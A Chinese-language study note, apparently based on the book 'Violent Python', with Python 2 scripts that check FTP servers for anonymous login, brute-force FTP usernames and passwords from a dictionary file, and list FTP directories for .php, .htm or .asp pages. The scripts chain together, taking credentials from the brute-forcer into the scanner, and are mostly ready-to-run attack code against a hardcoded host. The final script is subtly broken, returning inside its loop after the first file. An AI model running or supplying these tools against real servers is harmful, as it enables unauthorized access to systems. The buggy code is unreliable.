Python绝技笔记--------FTP匿名访问检测、用户名密码爆破、扫描是否存在web服务默认网页

利用ftplib模块
很简单，先获取ftp，然后匿名访问的话用户名是 anonymous

# -*- coding: UTF-8 -*-
import ftplib
def anonLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login('anonymous','[email protected]')
        print '\n[*]'+str(hostname) + 'FTP Anonymous Logon Succeeded.'
        ftp.quit()
        return True
    except Exception,e:
        print '\n[-]'+str(hostname)+'FTP Anonymous Logon Failed.'
        return False
host = '192.168.150.137'
anonLogin(host)

加上optparse方便些

# -*- coding: UTF-8 -*-
import ftplib
import optparse
def anonLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login('anonymous','[email protected]')
        print '\n[*] '+str(hostname) + ': FTP Anonymous Logon Succeeded.'
        ftp.quit()
        return True
    except Exception,e:
        print '\n[-] '+str(hostname)+': FTP Anonymous Logon Failed.'
        return False

def main():
    parse = optparse.OptionParser("usage %prog -H ")
    parse.add_option('-H',dest='tgtHost',type='string',help='specify target host')
    (options,args) = parse.parse_args()
    if (options.tgtHost==None):
        print parse.usage
    else:
        host=options.tgtHost
        anonLogin(host)
if __name__=='__main__':
    main()

那么可以写一个用户名密码爆破的工具，字典里面包含anonymous，那么就可以同时检测是否可以匿名登陆

# -*- coding: UTF-8 -*-
import ftplib
import optparse
from threading import Thread
def bruteLogin(hostname,passwordFile):
    with open(passwordFile,'r') as f:
        for line in f.readlines():
            username = line.split(':') [0]
            password = line.split(':') [1].strip('\r').strip('\n')
            print "[+] Trying: "+username+":"+password
            try:
                ftp = ftplib.FTP(hostname)
                ftp.login(username,password)
                print '\n[+] '+str(hostname)+': FTP Logon Succeeded: '+username+":"+password
                ftp.quit()
                return (username,password)
            except Exception,e:
                pass
        print '\n[-] Could not brute force FTP credentials.'
        return (None,None)

def main():
    parse = optparse.OptionParser("usage %prog -H  -P ")
    parse.add_option('-H',dest='tgtHost',type='string',help='specify target host')
    parse.add_option('-P',dest='tgtPassword',type='string',help='specify target password')
    (options,args) = parse.parse_args()
    if (options.tgtHost==None)|(options.tgtPassword==None):
        print parse.usage
    else:
        host=options.tgtHost
        passwordfile=options.tgtPassword
        bruteLogin(host,passwordfile)

if __name__=='__main__':
    main()

扫描 FTP服务器上是否有web服务的网页，扫描ftp文件中是否有默认的php,asp,html默认的网页。

# -*- coding: UTF-8 -*-
#这个版本设置的是利用的匿名登陆。当然用之前的爆破脚本爆破出用户名和密码在利用这个
import ftplib
def returnDefault(ftp):

    try:
        dirlist=ftp.nlst()
    except:
        dirlist= []
        print '[-] Could not list directory contents.'
        print '[-] Skipping To Next Target.'
        return
    retList = []
    for filename in dirlist:
        fn = filename.lower()
        if '.php' in fn or '.htm' in fn or '.asp' in fn:
            print '[+] Found default page: '+filename
            retList.append(filename)
        else:
            print '[-] Sorry it`s not have web defaulte page'
        return retList
host ='192.168.150.137'
ftp = ftplib.FTP(host)
ftp.login('anonymous','')
returnDefault(ftp)